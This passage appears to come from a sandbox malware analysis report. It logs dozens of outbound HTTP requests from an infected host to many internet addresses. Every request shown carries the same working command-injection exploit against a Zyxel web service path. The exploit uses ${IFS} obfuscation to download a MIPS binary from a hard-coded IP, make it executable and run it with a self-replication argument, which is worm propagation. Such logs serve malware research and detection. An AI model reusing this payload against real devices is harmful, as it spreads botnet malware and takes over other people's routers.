                                            Feb 2, 2024 06:21:32.026619911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9353192.168.2.1543140163.216.218.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026633978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9354192.168.2.1542502124.121.250.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026668072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9355192.168.2.1556184136.229.198.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026698112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9356192.168.2.1535764123.219.77.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026763916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9357192.168.2.1545578199.187.143.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026787996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9358192.168.2.1539284136.201.218.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026808977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9359192.168.2.153288291.223.65.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026870012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9360192.168.2.155032452.38.116.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026926041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9361192.168.2.155199889.225.16.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026943922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9362192.168.2.1543598165.52.69.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.026981115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9363192.168.2.155429638.167.84.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027007103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9364192.168.2.1549244116.155.145.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027033091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9365192.168.2.1552728138.124.240.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027060986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9366192.168.2.1560752123.236.236.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027103901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9367192.168.2.1552018138.200.201.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027168989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9368192.168.2.15445485.199.124.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027215958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9369192.168.2.154788020.36.125.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027232885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9370192.168.2.1559110146.244.63.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027306080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9371192.168.2.1548774108.24.4.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027349949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9372192.168.2.1542042111.172.240.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027378082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9373192.168.2.1558068194.114.100.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027442932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9374192.168.2.1555738201.18.72.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027450085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9375192.168.2.1553006167.214.85.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027486086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9376192.168.2.1536854162.237.65.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027497053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9377192.168.2.1542460192.54.54.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027556896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9378192.168.2.1533504159.44.245.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027591944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9379192.168.2.155268632.155.156.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027623892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9380192.168.2.1550280175.183.115.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027674913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9381192.168.2.1541616149.0.235.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027724028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9382192.168.2.1551820205.192.153.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027744055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9383192.168.2.1534552128.220.223.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027777910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9384192.168.2.1556694173.16.157.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027832031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9385192.168.2.1547028160.28.36.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027877092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9386192.168.2.155212265.208.84.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027903080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9387192.168.2.155220238.208.83.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027932882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9388192.168.2.154408096.213.0.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.027972937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9389192.168.2.155387072.44.123.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028018951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9390192.168.2.155428662.82.208.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028063059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9391192.168.2.153495835.93.150.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028104067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9392192.168.2.155540466.20.183.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028105974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9393192.168.2.1533322172.71.140.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028167009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9394192.168.2.1555554189.9.240.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028211117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9395192.168.2.1546526154.165.30.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028242111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9396192.168.2.1552520126.174.245.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028300047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9397192.168.2.1536328113.227.64.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028331995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9398192.168.2.1538238146.242.54.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028356075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9399192.168.2.1539608177.65.232.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028387070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9400192.168.2.1541816161.116.27.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028419971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9401192.168.2.154912434.177.64.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028451920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9402192.168.2.156018869.247.193.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028487921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9403192.168.2.1548768143.104.129.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028522015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9404192.168.2.1559786163.161.62.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028570890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9405192.168.2.155372471.195.0.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028593063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9406192.168.2.1559328110.164.69.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028651953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9407192.168.2.1550866209.136.122.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028681993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9408192.168.2.1557748173.117.40.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028726101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9409192.168.2.1537264181.97.181.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028774023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9410192.168.2.153729270.202.124.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028820992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9411192.168.2.1546944157.244.196.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028865099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9412192.168.2.1542524129.128.49.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028923035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9413192.168.2.1534828131.121.37.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.028944969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9414192.168.2.1541336191.202.121.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029000044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9415192.168.2.155183442.242.33.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.029010057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9416192.168.2.1553126161.175.137.127443
                                            TimestampBytes transferredDirectionData
